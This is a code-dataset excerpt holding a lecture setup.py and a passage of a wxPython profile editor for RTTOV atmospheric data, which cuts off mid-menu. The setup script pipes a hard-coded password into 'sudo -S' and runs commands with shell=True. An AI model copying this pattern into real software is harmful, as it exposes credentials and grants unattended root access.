] | 4 | 2018-09-12T04:49:47.000Z | 2020-07-14T00:12:09.000Z | setup.py | choki0715/lecture | 2904b20387925c7f33db9ecd85fc71adf2750f3d | [
"MIT"
] | null | null | null | setup.py | choki0715/lecture | 2904b20387925c7f33db9ecd85fc71adf2750f3d | [
"MIT"
] | 7 | 2018-09-10T09:28:43.000Z | 2019-12-20T01:46:25.000Z | import subprocess
install_cmd_list = [
'echo "passwd" | sudo -S apt -y install virtualenv git python3-tk',
'virtualenv -p python3 /home/user/multicamp',
'/home/user/multicamp/bin/pip3 install --upgrade tensorflow==1.14 matplotlib ipykernel jupyter music21 gym',
'/home/user/multicamp/bin/python3 -m ipykernel install --user',
]
for install_cmd in install_cmd_list:
install_proc = subprocess.Popen(install_cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True)
while install_proc.poll() is None:
out = install_proc.stdout.readline()
print(out.decode('utf-8'), end='')
| 44.285714 | 112 | 0.722581 |
a01836d12bd9fab41be16ee6d318addd37e3967f | 33,352 | py | Python | source/gui/rview/profileframe.py | bucricket/projectMAScorrection | 89489026c8e247ec7c364e537798e766331fe569 | [
"BSD-3-Clause"
] | null | null | null | source/gui/rview/profileframe.py | bucricket/projectMAScorrection | 89489026c8e247ec7c364e537798e766331fe569 | [
"BSD-3-Clause"
] | 1 | 2022-03-12T12:19:59.000Z | 2022-03-12T12:19:59.000Z | source/gui/rview/profileframe.py | bucricket/projectMAScorrection | 89489026c8e247ec7c364e537798e766331fe569 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
import wx
import rmodel
import util
import locale
import wxmpl
import numpy
import matplotlib
import wx.lib.agw.floatspin as FS
from profileframeutils import Data, GenericPlotItemPanel, MyNotebook
from profileframeutils import PlotItemPanelAll
from util import kindOfItem, axesDef
import copy
locale.setlocale(locale.LC_ALL, '')
class ComputeDialog(wx.Dialog):
    """Dialog asking for a pressure range (pmin/pmax) and a linear transform
    (scale/offset) to apply to a profile curve.

    Read the user's choices back with GetSelections() after ShowModal()
    returns wx.ID_OK.
    """

    def __init__(
            self, parent, ID, title, text="", pmin0=0, pmax0=1000, scale0=1.,
            offset0=0., increment=None, size=wx.DefaultSize,
            pos=wx.DefaultPosition,
            style=wx.DEFAULT_DIALOG_STYLE,
            useMetal=False, limits_scale=(0.01, 10), limits_offset=(-100, 100)
    ):
        # Instead of calling wx.Dialog.__init__ we precreate the dialog
        # so we can set an extra style that must be set before
        # creation, and then we create the GUI object using the Create
        # method.  (Classic wxPython two-step creation idiom.)
        if increment is None:
            increment = 10.
        pre = wx.PreDialog()
        pre.SetExtraStyle(wx.DIALOG_EX_CONTEXTHELP)
        pre.Create(parent, ID, title, pos, size, style)

        # This next step is the most important, it turns this Python
        # object into the real wrapper of the dialog (instead of pre)
        # as far as the wxPython extension is concerned.
        self.PostCreate(pre)

        # This extra style can be set after the UI object has been created.
        if 'wxMac' in wx.PlatformInfo and useMetal:
            self.SetExtraStyle(wx.DIALOG_EX_METAL)

        # Now continue with the normal construction of the dialog
        # contents
        sizer = wx.BoxSizer(wx.VERTICAL)

        label = wx.StaticText(self, -1, text)
        label.SetHelpText("help text")
        sizer.Add(label, 0, wx.ALIGN_CENTRE | wx.ALL, 5)

        # box 1: pmin spinner (pressure in hPa, bounded to a physical range)
        box = wx.BoxSizer(wx.HORIZONTAL)
        label = wx.StaticText(self, -1, "p min:")
        box.Add(label, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
        self.pminFS = FS.FloatSpin(self, -1, min_val=0.00001, max_val=1150,
                                   digits=3, value=pmin0,
                                   increment=increment, agwStyle=FS.FS_LEFT)
        box.Add(self.pminFS, 1, wx.ALIGN_CENTRE | wx.ALL, 5)
        sizer.Add(box, 0, wx.GROW | wx.ALIGN_CENTER_VERTICAL | wx.ALL, 5)
        # box 2: pmax spinner
        box = wx.BoxSizer(wx.HORIZONTAL)
        label = wx.StaticText(self, -1, "p max:")
        box.Add(label, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
        self.pmaxFS = FS.FloatSpin(self, -1, min_val=0.00001, max_val=1150,
                                   digits=3, value=pmax0,
                                   increment=increment, agwStyle=FS.FS_LEFT)
        box.Add(self.pmaxFS, 1, wx.ALIGN_CENTRE | wx.ALL, 5)
        sizer.Add(box, 0, wx.GROW | wx.ALIGN_CENTER_VERTICAL | wx.ALL, 5)
        # box 3: scale spinner (bounds come from limits_scale)
        box = wx.BoxSizer(wx.HORIZONTAL)
        label = wx.StaticText(self, -1, "scale:")
        box.Add(label, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
        self.scale = FS.FloatSpin(self, -1, min_val=limits_scale[0],
                                  max_val=limits_scale[1], digits=2,
                                  value=scale0,
                                  increment=1, agwStyle=FS.FS_LEFT)
        box.Add(self.scale, 1, wx.ALIGN_CENTRE | wx.ALL, 5)
        # box 4: offset spinner shares the same row as scale
        label = wx.StaticText(self, -1, "offset:")
        box.Add(label, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
        self.offset = FS.FloatSpin(self, -1, min_val=limits_offset[0],
                                   max_val=limits_offset[1], digits=3,
                                   value=offset0,
                                   increment=1, agwStyle=FS.FS_LEFT)
        box.Add(self.offset, 1, wx.ALIGN_CENTRE | wx.ALL, 5)
        sizer.Add(box, 0, wx.GROW | wx.ALIGN_CENTER_VERTICAL | wx.ALL, 5)

        line = wx.StaticLine(self, -1, size=(20, -1), style=wx.LI_HORIZONTAL)
        sizer.Add(line, 0, wx.GROW | wx.ALIGN_CENTER_VERTICAL |
                  wx.RIGHT | wx.TOP, 5)
        # standard OK/Cancel buttons
        btnsizer = wx.StdDialogButtonSizer()

        btn = wx.Button(self, wx.ID_OK)
        btn.SetDefault()
        btnsizer.AddButton(btn)

        btn = wx.Button(self, wx.ID_CANCEL)
        btnsizer.AddButton(btn)
        btnsizer.Realize()

        sizer.Add(btnsizer, 0, wx.ALIGN_CENTER_VERTICAL | wx.ALL, 5)

        self.SetSizer(sizer)
        sizer.Fit(self)
        # NOTE(review): callers use ShowModal(); this extra Show() looks
        # redundant for a modal dialog -- confirm before removing.
        self.Show()

    def GetSelections(self):
        # Returns (pmin, pmax, scale, offset) as entered by the user.
        return (self.pminFS.GetValue(), self.pmaxFS.GetValue(),
                self.scale.GetValue(), self.offset.GetValue())
class AxesDialog(wx.Dialog):
    """Dialog asking for new x-axis limits (xmin/xmax) of a profile plot.

    Read the values back with GetSelections() after ShowModal() returns
    wx.ID_OK.  NOTE(review): the ``scale`` parameter is accepted but never
    used by this dialog.
    """

    def __init__(
            self, parent, ID, title, text="", xmin0=0, xmax0=0,
            scale="linear", increment=None, size=wx.DefaultSize,
            pos=wx.DefaultPosition,
            style=wx.DEFAULT_DIALOG_STYLE,
            useMetal=False,
    ):
        # Instead of calling wx.Dialog.__init__ we precreate the dialog
        # so we can set an extra style that must be set before
        # creation, and then we create the GUI object using the Create
        # method.  (Classic wxPython two-step creation idiom.)
        if increment is None:
            increment = 10
        pre = wx.PreDialog()
        pre.SetExtraStyle(wx.DIALOG_EX_CONTEXTHELP)
        pre.Create(parent, ID, title, pos, size, style)

        # This next step is the most important, it turns this Python
        # object into the real wrapper of the dialog (instead of pre)
        # as far as the wxPython extension is concerned.
        self.PostCreate(pre)

        # This extra style can be set after the UI object has been created.
        if 'wxMac' in wx.PlatformInfo and useMetal:
            self.SetExtraStyle(wx.DIALOG_EX_METAL)

        # Now continue with the normal construction of the dialog
        # contents
        sizer = wx.BoxSizer(wx.VERTICAL)

        label = wx.StaticText(self, -1, text)
        label.SetHelpText("help text")
        sizer.Add(label, 0, wx.ALIGN_CENTRE | wx.ALL, 5)

        # box 1: xmin spinner
        box = wx.BoxSizer(wx.HORIZONTAL)
        label = wx.StaticText(self, -1, "x min:")
        box.Add(label, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
        self.xminFS = FS.FloatSpin(self, -1, min_val=0, max_val=1000000000,
                                   digits=2, value=xmin0,
                                   increment=increment, agwStyle=FS.FS_LEFT)
        box.Add(self.xminFS, 1, wx.ALIGN_CENTRE | wx.ALL, 5)
        sizer.Add(box, 0, wx.GROW | wx.ALIGN_CENTER_VERTICAL | wx.ALL, 5)
        # box 2: xmax spinner
        box = wx.BoxSizer(wx.HORIZONTAL)
        label = wx.StaticText(self, -1, "x max:")
        box.Add(label, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
        self.xmaxFS = FS.FloatSpin(self, -1, min_val=0, max_val=1000000000,
                                   digits=2, value=xmax0,
                                   increment=increment, agwStyle=FS.FS_LEFT)
        box.Add(self.xmaxFS, 1, wx.ALIGN_CENTRE | wx.ALL, 5)
        sizer.Add(box, 0, wx.GROW | wx.ALIGN_CENTER_VERTICAL | wx.ALL, 5)
        # standard OK/Cancel buttons
        btnsizer = wx.StdDialogButtonSizer()

        btn = wx.Button(self, wx.ID_OK)
        btn.SetDefault()
        btnsizer.AddButton(btn)

        btn = wx.Button(self, wx.ID_CANCEL)
        btnsizer.AddButton(btn)
        btnsizer.Realize()

        sizer.Add(btnsizer, 0, wx.ALIGN_CENTER_VERTICAL | wx.ALL, 5)

        self.SetSizer(sizer)
        sizer.Fit(self)
        # NOTE(review): callers use ShowModal(); this extra Show() looks
        # redundant for a modal dialog -- confirm before removing.
        self.Show()

    def GetSelections(self):
        # Returns (xmin, xmax) as entered by the user.
        return (self.xminFS.GetValue(), self.xmaxFS.GetValue())
class PlotItemPanel(GenericPlotItemPanel):
    """ plot on a PlotPanel one curve """

    def __init__(self, parent, value, pression, theName, liste_item=None,
                 kind="GASES", xlegend="ppmv",
                 layerstyle=False, layer=None, yInPressions=True, tskin=None):
        # Always editable: this panel is the right-hand "edit one curve" view.
        edit = True
        GenericPlotItemPanel.__init__(self, parent, value, pression, theName,
                                      liste_item,
                                      kind=kind, xlegend=xlegend,
                                      edit=edit, layerstyle=layerstyle,
                                      layer=layer, yInPressions=yInPressions,
                                      tskin=tskin)

    def ComputeProfile(self, pmin, pmax, scale, offset):
        """ change the values of the profile between pmin and pmax :
            multiply by scale and add offset """
        if not self.layerstyle:
            # Level quantities (T, gases): save a copy of the current values
            # for undo, then transform every level whose pressure is in range.
            y = numpy.zeros(self.x.shape[0]) + self.x
            self.valueHistory.append(y)
            for i in range(self.x.shape[0]):
                p = self.pression[i]
                if p >= pmin and p <= pmax:
                    val = self.x[i]
                    # Floor at 0.0001 so the value stays strictly positive.
                    self.x[i] = max(0.0001, scale * val + offset)
            self.data.setChanged(True)
            self.data.myUpdate(self.x, self.y)
            self.Update()
        else:
            # Layer quantities (aerosols, clouds): same scheme on the layer
            # arrays; here the floor is 0 (zero content is allowed).
            y = numpy.zeros(self.xlayeritem.shape[0]) + self.xlayeritem
            self.valueHistory.append(y)
            for i in range(self.xlayeritem.shape[0]):
                p = self.ylayeritem[i]
                if p >= pmin and p <= pmax:
                    self.xlayeritem[i] = max(
                        0, scale * self.xlayeritem[i] + offset)
            self.data.setChanged(True)
            self.data.myUpdate(self.xlayeritem, self.ylayeritem)
            # Rebuild the level representation from the edited layer values.
            self.x = self.myLayeritem.getLayeritem(self.xlayeritem)
            self.Update()
class ProfileView(util.GenericViewRadio):
""" Profile window of the application """
helpTitle = "Help Profile"
helpMessage = """
Select and visualize a component profile on the right panel
Click the middle button or the right button to modify the profile.
Use the matplotlib toolbar to zoom.
Apply your changes or save the profile
for the next run of RTTOV.
"""
    def __init__(self, parent, profile, edit=True, controler=None):
        """Build the two-panel profile editor window.

        A deep copy of *profile* is edited; the original is kept in
        self.myProfileRef.  The left panel (nb_all) shows all curves per
        kind, the right panel (nb) shows one editable curve per page.
        """
        self.edit = edit
        self.myProfileRef = profile
        self.myProfile = copy.deepcopy(profile)
        # Cloud pages: every cloud type plus the CFRAC and CLW companions.
        self.my_list_cloud = []
        self.myControler = controler
        for cloud in self.myProfile.cloud_list:
            self.my_list_cloud.append(cloud)
        self.my_list_cloud.append("CFRAC")
        self.my_list_cloud.append("CLW")
        util.GenericView.__init__(self, parent, "profile")

        sizer = wx.BoxSizer(wx.HORIZONTAL)
        self.SetSizer(sizer)

        self.CreateMenuBar()
        self.SetSize((1300, 700))
        self.SetMinSize((1300, 700))
        self.SetTitle('PROFILE EDITOR')
        self._ComputeLayers(self.myProfile['P'])
        # panel 1 notebook with all curves (GASES, AEROSOLS, CLOUDS)
        self.panel1 = wx.Panel(self, -1, style=wx.BORDER_SIMPLE)
        self.panel1.SetSize((200, 500))
        sizer.Add(self.panel1, 1, wx.EXPAND)
        # creation of notebook for the panel 1
        self.nb_all = MyNotebook(self.panel1, isRightPage=False)
        sizer1 = wx.BoxSizer()
        sizer1.Add(self.nb_all, 1, wx.EXPAND)
        self.panel1.SetSizer(sizer1)
        # panel 2 notebook with one curve
        self.panel2 = wx.Panel(self, -1, style=wx.BORDER_SIMPLE)
        sizer.Add(self.panel2, 1, wx.EXPAND)
        # creation of the notebook for the panel 2
        self.nb = MyNotebook(self.panel2)
        self.axesDef = []
        # create the plot pages on both notebooks
        self.Plot(self.myProfile)
        # create a second sizer for the notebook
        sizer2 = wx.BoxSizer()
        sizer2.Add(self.nb, 1, wx.EXPAND)
        self.panel2.SetSizer(sizer2)

        self.sb = self.CreateStatusBar()
        self.sb.SetBackgroundColour('WHITE')
        txt = ''
        self.sb.SetStatusText(txt)
        self.Centre()
        self.Show(True)
    def PlotLeft(self):
        """Populate the left notebook: one page per kind, all curves together.

        AEROSOLS/CLOUDS pages are only created when the profile contains
        any such item.
        """
        self.allGraphicsPages = {}
        self.allGraphicsPages['GASES'] = PlotItemPanelAll(
            self.nb_all,
            self.myProfile,
            kind='GASES',
            xlegend=self.myProfile.gas_units_legend,
            xlegendT="Temperature (K)",
            tickSize=10)
        self.nb_all.AddPage(self.allGraphicsPages['GASES'], 'GASES')
        if self.myProfile.anyAerosol():
            self.allGraphicsPages['AEROSOLS'] = PlotItemPanelAll(
                self.nb_all,
                self.myProfile,
                kind="AEROSOLS",
                layer=self.layer,
                xlegend="number density (cm-3)",
                xlegendT="Temperature (K)",
                XinLog=True,
                tickSize=10)
            self.nb_all.AddPage(self.allGraphicsPages['AEROSOLS'], 'AEROSOLS')
        if self.myProfile.anyCloud():
            self.allGraphicsPages['CLOUDS'] = PlotItemPanelAll(
                self.nb_all,
                self.myProfile,
                kind="CLOUDS",
                layer=self.layer,
                xlegend="layer mean content (g/m3)",
                xlegendT="Temperature (K)",
                XinLog=True,
                tickSize=10)
            self.nb_all.AddPage(self.allGraphicsPages['CLOUDS'], 'CLOUDS')
    def Plot(self, profile=None):
        """Build all right-notebook pages (one editable curve each), then the
        left panel.  If *profile* is given, it replaces the edited copy."""
        if profile is not None:
            self.myProfileRef = profile
            self.myProfile = copy.deepcopy(profile)
            self._ComputeLayers(self.myProfile['P'])
        self.graphicPages = {}
        # Temperature page is always present.
        self.graphicPages['T'] = PlotItemPanel(self.nb, self.myProfile['T'],
                                               self.myProfile['P'],
                                               theName='T',
                                               xlegend="temperature (K)")
        self.nb.AddPage(self.graphicPages['T'], 'T')
        self.graphicPages['T'].ConnectCanvasEVT_POINT(self.OnPoint)
        # One page per gas present in the profile.
        for gas in self.myProfile.gas_list:
            if self.myProfile[gas] is not None:
                self.graphicPages[gas] = PlotItemPanel(
                    self.nb,
                    self.myProfile[gas],
                    self.myProfile['P'],
                    xlegend=self.myProfile.gas_units_legend,
                    theName=gas)
                self.nb.AddPage(self.graphicPages[gas], gas)
                self.graphicPages[gas].ConnectCanvasEVT_POINT(self.OnPoint)
        # Aerosols are layer quantities: drawn in layer style on mid-layer y.
        if self.myProfile.anyAerosol():
            for aerosol in self.myProfile.aerosol_list:
                if self.myProfile[aerosol] is not None:
                    self.graphicPages[aerosol] = PlotItemPanel(
                        self.nb,
                        self.myProfile[aerosol],
                        self.myProfile['P'],
                        theName=aerosol,
                        kind="AEROSOLS",
                        layerstyle=True,
                        xlegend="number density (cm-3)",
                        layer=self.layer)
                    self.nb.AddPage(self.graphicPages[aerosol], aerosol)
                    self.graphicPages[
                        aerosol].ConnectCanvasEVT_POINT(self.OnPoint)
        # Clouds (plus CFRAC/CLW) are also layer quantities; CFRAC gets its
        # own dimensionless legend.
        if self.myProfile.anyCloud():
            for cloud in self.my_list_cloud:
                if self.myProfile[cloud] is not None:
                    if cloud == "CFRAC":
                        mylegend = "CFRAC"
                    else:
                        mylegend = "layer mean content (g/m3)"
                    self.graphicPages[cloud] = PlotItemPanel(
                        self.nb,
                        self.myProfile[cloud],
                        self.myProfile['P'],
                        theName=cloud,
                        kind="CLOUDS",
                        layerstyle=True,
                        xlegend=mylegend,
                        layer=self.layer)
                    self.nb.AddPage(self.graphicPages[cloud], cloud)
                    self.graphicPages[
                        cloud].ConnectCanvasEVT_POINT(self.OnPoint)
        # delete empty graphicPages
        # NOTE(review): deleting while iterating .keys() is safe on Python 2
        # (keys() returns a list) but would break on Python 3.
        for key in self.graphicPages.keys():
            if self.myProfile[key] is None:
                del self.graphicPages[key]
        # plot panel 1 with all gas
        self.PlotLeft()
    def OnPoint(self, e):
        """ update the graphic when receive event e """
        # Busy cursor while the current right page handles the point edit;
        # if the page actually changed something, refresh the left panel.
        wx.BeginBusyCursor()
        wx.SafeYield(None, True)
        cp = self.nb.GetCurrentPage()
        hasDoSomething = cp.OnPoint(e)
        if hasDoSomething:
            self.UpdateAllGraphics()
        wx.EndBusyCursor()
    def UpdateAllGraphics(self):
        """ update the left panel after getting all information
            from the right panels"""
        # get the name of the RightPlotPanel
        cp = self.nb.GetCurrentPage()
        theName = cp.theName
        theKind = cp.kind
        self.GetProfile()
        # update the profile with curves from all rights panels
        self.allGraphicsPages[theKind].UpdateData(self.myProfile, theName)
        # A temperature change is also drawn on the aerosol/cloud overview
        # pages, so propagate it to those as well.
        if theName == "T":
            for kind in ("AEROSOLS", "CLOUDS"):
                if kind in self.allGraphicsPages:
                    self.allGraphicsPages[kind].UpdateData(
                        self.myProfile, theName)
def _ComputeLayers(self, pression):
""" Compute the mean value of pression in a layer """
foo = numpy.empty(pression.shape[0] - 1)
for i in range(foo.shape[0]):
foo[i] = (pression[i + 1] + pression[i]) / 2
self.layer = foo
    def _MakeBinding(self):
        """ set the trivial Binding for the View """
        # binding cancel button
        # NOTE(review): intentionally empty stub -- no bindings are made here.
def GetProfile(self):
""" return the profile as modified by the edition frame """
self.write("Get profile from the edition panels")
self.myProfile["T"] = self.graphicPages["T"].GetItem()
for gas in self.myProfile.gas_list:
if self.myProfile[gas]is not None:
self.myProfile[gas] = self.graphicPages[gas].GetItem()
if self.myProfile.anyAerosol:
for aerosol in self.myProfile.aerosol_list:
if self.myProfile[aerosol] is not None:
self.myProfile[aerosol] = self.graphicPages[
aerosol].GetItem()
if self.myProfile.anyCloud:
for item in self.my_list_cloud:
if self.myProfile[item] is not None:
self.myProfile[item] = self.graphicPages[item].GetItem()
return self.myProfile
    def RePlotAll(self, profile=None):
        """ Plot the 2 panels with (new) profile (delete everything
            before redraw) """
        if profile is not None:
            self.myProfileRef = profile
            self.myProfile = copy.deepcopy(profile)
            self._ComputeLayers(self.myProfile['P'])
        # remove all pages of the notebook
        self.nb.DeleteAllPages()
        self.nb_all.DeleteAllPages()
        self.Plot()
    def RePlotAllLeftPanel(self, profile=None):
        """ Plot the left panel with (new) profile (delete everything
            before redraw) """
        if profile is not None:
            self.myProfileRef = profile
            self.myProfile = copy.deepcopy(profile)
            self._ComputeLayers(self.myProfile['P'])
        # remove all pages of the notebook (left panel only; the right
        # notebook keeps its pages)
        self.nb_all.DeleteAllPages()
        self.PlotLeft()
    def deleteRightPage(self, item):
        """ delete the item page """
        # Find the notebook page by its tab text, disconnect its events,
        # then drop both the page and the graphicPages entry.
        for i in range(self.nb.GetPageCount()):
            if self.nb.GetPageText(i) == item:
                self.graphicPages[item].DisconnectCanvasEVT_POINT()
                self.nb.DeletePage(i)
                self.graphicPages.pop(item)
                break
        kind = kindOfItem[item]
        # When the last cloud is removed, the companion CFRAC/CLW pages no
        # longer make sense: remove them recursively.
        if kind == "CLOUDS" and not self.myProfile.anyCloud():
            if 'CFRAC' in self.graphicPages:
                self.deleteRightPage('CFRAC')
            if 'CLW' in self.graphicPages:
                self.deleteRightPage('CLW')
def addRightPage(self, item):
""" add an new item page """
kind = kindOfItem[item]
if kind == "GASES":
myY = self.myProfile['P']
myLayerstyle = False
else:
myY = self.layer
myLayerstyle = True
self.graphicPages[item] = PlotItemPanel(
self.nb, self.myProfile[item], self.myProfile['P'],
theName=item, kind=kind,
layerstyle=myLayerstyle,
xlegend=self.myProfile.gas_units_legend, layer=myY)
self.nb.AddPage(self.graphicPages[item], item)
if kind == "CLOUDS":
if 'CFRAC' not in self.graphicPages:
item = 'CFRAC'
self.graphicPages[item] = PlotItemPanel(
self.nb, self.myProfile[item], self.myProfile['P'],
theName=item, kind=kind,
layerstyle=True,
xlegend="CFRAC", layer=myY)
self.nb.AddPage(self.graphicPages[item], item)
self.graphicPages[item].ConnectCanvasEVT_POINT(self.OnPoint)
    def replotLeftPage(self):
        """ replot the left panel """
        self.RePlotAllLeftPage = None  # (placeholder removed)
        self.RePlotAllLeftPanel()

    def OnUndo(self, e):
        # Undo the last edit on the currently selected right page, then
        # refresh the left overview panel.
        pageName = self.nb.GetPage(self.nb.GetSelection()).theName
        self.graphicPages[pageName].OnUndo()
        self.UpdateAllGraphics()

    def OnRedo(self, e):
        # Redo the last undone edit on the currently selected right page,
        # then refresh the left overview panel.
        pageName = self.nb.GetPage(self.nb.GetSelection()).theName
        self.graphicPages[pageName].OnRedo()
        self.UpdateAllGraphics()
    def OnClose(self, e):
        """ close the profile windows"""
        print ">>> Close profileView"
        # Detach this view from its controller so it is not reused after
        # the window is destroyed.
        if self.myControler is not None:
            self.myControler.profileView = None
        self.Close()

    def OnControlCFRAC(self):
        """ Control CFRAC versus Clouds and update the graphic if necessary """
        self.myProfile.ctrlCoherenceClouds()
        if 'CFRAC' in self.graphicPages:
            self.graphicPages['CFRAC'].UpdateData(self.myProfile['CFRAC'])
    def OnSaveProfile(self, e):
        """ return the name for a profile File """
        # Pull the edits from the panels and sanity-check clouds before
        # prompting for the save file.
        self.myProfile = self.GetProfile()
        self.OnControlCFRAC()
        fileSaved = self.OnSaveFile(e, "Save a profile")
        return fileSaved

    def OnApplyChange(self, e):
        """ get profile change from panels and return a profile """
        self.myProfile = self.GetProfile()
        self.OnControlCFRAC()
        return self.myProfile

    def OnSaveProfileAs(self, e):
        """ return the name for a profile File """
        # NOTE(review): identical to OnSaveProfile -- "Save" and "Save As"
        # currently behave the same.
        self.myProfile = self.GetProfile()
        self.OnControlCFRAC()
        fileSaved = self.OnSaveFile(e, "Save a profile")
        return fileSaved
    def OnInsert(self, e):
        # Switch every right page to point-insertion mode (onInsert flag is
        # presumably read by the page's point-edit handler -- confirm).
        for item in self.graphicPages.keys():
            self.graphicPages[item].onInsert = True

    def OnRemove(self, e):
        # Switch every right page to point-removal mode.
        for item in self.graphicPages.keys():
            self.graphicPages[item].onInsert = False
    def OnAddgas(self, e):
        # remove=False: changeItem offers the gases NOT yet in the profile.
        self.changeItem(self.myProfile.gas_list, "no gas to add",
                        "Choose the gases to add to the profile",
                        self.myProfile.addGas, False)

    def OnAddAerosol(self, e):
        self.changeItem(self.myProfile.aerosol_list, "no aerosol to add",
                        "Choose the aerosols to add to the profile",
                        self.myProfile.addAerosol, False, kind="AEROSOLS")
def OnAddCloud(self, e):
self.changeItem(self.myProfile.cloud_list, "no layeritem to remove",
"Choose the clouds to add to the profile",
self.myProfile.addCloud, False, kind="CLOUDS")
def OnRemovegas(self, e):
self.changeItem(self.myProfile.gas_list, "no gas to remove",
"Choose the gases to remove from the profile",
self.myProfile.removeGas)
def OnRemoveAerosol(self, e):
self.changeItem(self.myProfile.aerosol_list, "no aerosol to remove",
"Choose the aerosols to remove from the profile",
self.myProfile.removeAerosol, kind="AEROSOLS")
def OnRemoveCloud(self, e):
self.changeItem(self.myProfile.cloud_list, "no layeritem to remove",
"Choose the clouds to remove from the profile",
self.myProfile.removeCloud, kind="CLOUDS")
    def changeItem(self, liste_item, message1, message2, action, remove=True,
                   kind="GASES"):
        """ perform the action on self.myProfile """
        # Generic add/remove driver: build the list of candidate items,
        # let the user pick some, apply *action* to each, and keep the
        # notebook pages and cloud coherence in sync.
        # message1: info text when there is nothing to do;
        # message2: title of the multi-choice dialog.
        wx.BeginBusyCursor()
        myList = []
        if remove:
            for item in liste_item:
                # cannot remove 'Q'
                if not (item == 'Q'):
                    if self.myProfile[item] is not None:
                        myList.append(item)
        else:
            # Adding: offer only the items not yet present in the profile.
            for item in liste_item:
                if self.myProfile[item] is None:
                    myList.append(item)
        if myList == []:
            self.ShowInfoMessage(message1)
        else:
            list_to_change = self. ShowDialogList(message2, myList)
            if list_to_change is not None:
                for item in list_to_change:
                    action(item)
                    if remove:
                        self.deleteRightPage(item)
                    else:
                        self.addRightPage(item)
                # clouds changed: re-check CFRAC coherence before redrawing
                if kind == "CLOUDS":
                    print "control coherence layeritem recompute CFRAC"
                    self.OnControlCFRAC()
                self.replotLeftPage()
        wx.EndBusyCursor()
    def OnReplaceAerosolByClim(self, e):
        # Replace all aerosol profiles by a predefined climatology chosen by
        # the user, then redraw both panels.
        listItem = ["Continental clean", "Continental average",
                    "Continental polluted", "Urban",
                    "Desert", "Maritime clean", "Maritime polluted",
                    "Maritime tropical", "Arctic", "Antarctic"]
        selection = self.ShowDialogSingleChoice("Choose climatology", listItem)
        if selection is not None:
            self.write("replace aerosols by climatology " +
                       str(listItem[selection]))
            # selection is 0-based; replaceByAerosolClim apparently expects
            # a 1-based climatology id -- confirm against its definition.
            self.myProfile.replaceByAerosolClim(selection + 1)
            self.RePlotAll()
def ShowDialogSingleChoice(self, label, listItem):
    """Show a single-choice dialog; return the selected index or None if cancelled."""
    selection = None
    dlg = wx.SingleChoiceDialog(self, label, "", listItem)
    if (dlg.ShowModal() == wx.ID_OK):
        selection = dlg.GetSelection()
        self.write("Selection: " + str(selection))
    dlg.Destroy()
    return selection
def ShowDialogList(self, label, listItem):
    """Show a multi-choice dialog; return the selected item strings or None if cancelled."""
    strings = None
    dlg = wx.MultiChoiceDialog(self, label, "", listItem)
    if (dlg.ShowModal() == wx.ID_OK):
        selections = dlg.GetSelections()
        # GetSelections() returns indices; map them back to the item strings
        strings = [listItem[x] for x in selections]
        self.write("Selections: " + str(strings))
    dlg.Destroy()
    return strings
def OnMouseMove(self, e):
    """Placeholder: intended to show the x/y value of the left plot in the
    status bar, but not implemented."""
    pass
def OnEditXAxe(self, e):
    """Open a dialog to edit the X-axis limits of the current graphic page."""
    self.GetProfile()
    mypage = self.nb.GetCurrentPage()
    item = mypage.theName
    (xmin, xmax) = mypage.axes.get_xlim()
    theScale = mypage.axes.get_xscale()
    # clouds use small fractional values, so offer a finer spin increment
    if mypage.kind == "CLOUDS":
        theIncrement = 0.1
    else:
        theIncrement = 10
    dlg = AxesDialog(self, -1, "X axe edit",
                     text="enter X limits for " + item,
                     xmin0=xmin, xmax0=xmax, scale=theScale,
                     increment=theIncrement)
    if (dlg.ShowModal() == wx.ID_OK):
        (xmin, xmax) = dlg.GetSelections()
        self.graphicPages[item].SetXlimits(xmin=xmin, xmax=xmax)
        self.graphicPages[item].Update()
    dlg.Close()
def OnChangeProfile(self, e):
    """Open a dialog to scale/offset the current page's profile values
    between two pressure levels, then refresh all graphics."""
    self.GetProfile()
    mypage = self.nb.GetCurrentPage()
    item = mypage.theName
    (pmax, pmin) = mypage.axes.get_ylim()
    # allowed offset range is derived from the current data range
    min_offset = min(mypage.x)
    max_offset = max(mypage.x) * 2
    # cloud fractions are bounded by 1
    if mypage.kind == "CLOUDS":
        max_offset = 1
    dlg = ComputeDialog(self, -1, "change profile values",
                        text="enter value for " + item,
                        pmin0=pmin, pmax0=pmax,
                        limits_offset=(-min_offset, max_offset))
    if (dlg.ShowModal() == wx.ID_OK):
        (pmin, pmax, scale, offset) = dlg.GetSelections()
        self.write("update values for " + str(item))
        self.write("between pmin: %d pmax: %d " % (pmin, pmax))
        self.write("between scale: %g offset: %g" % (scale, offset))
        mypage.ComputeProfile(pmin, pmax, scale, offset)
        self.UpdateAllGraphics()
    dlg.Close()
def MenuData(self):
    """ define the data for the menu

    Each menu entry tuple is
    (label, help text, handler, key, flag1, flag2);
    the two trailing booleans are presumed enabled/checkable flags --
    TODO(review): confirm against the menu-building code.
    An empty-string entry inserts a separator.
    """
    if self.edit:
        return(("&File",  # File Menu
                ("Apply change", "Apply the profile ",
                 self.OnApplyChange, "applyChange", True, False),
                ("Save profile", "Save the profile file",
                 self.OnSaveProfile, "saveProfile", True, False),
                ("Save profile as", "Save the profile file",
                 self.OnSaveProfileAs, "saveProfileAs", True, False),
                ('&Quit', 'Quit', self.OnClose, "quit", True, False)),
               ("&Edit",  # Edit Menu
                ("Undo", "Undo the last operation",
                 self.OnUndo, "undo", True, False),
                ("Redo", "Redo the last operation",
                 self.OnRedo, "redo", True, False),
                ("", "", "", "", True, False),
                ("insert", "mode for add or modify points",
                 self.OnInsert, "insert", True, True),
                ("remove", "mode for suppress points",
                 self.OnRemove, "remove", True, True),
                ("", "", "", "", True, False),
                ("change profile values", "chage the profile values",
                 self.OnChangeProfile, "changProfile", True, False),
                ("edit x axe", "configure x axe",
                 self.OnEditXAxe, "edit x axe", True, False),
                ("", "", "", "", True, False),
                ("Add gas", "add a gas", self.OnAddgas,
                 "Add gas", True, False),
                ("Remove gas", "remove a gas",
                 self.OnRemovegas, "Remove gas", True, False),
                ("Add aerosol", "add an aerosol",
                 self.OnAddAerosol, "Add aerosol", True, False),
                ("Remove aerosol", "remove an aerosol",
                 self.OnRemoveAerosol, "Remove aerosol", True, False),
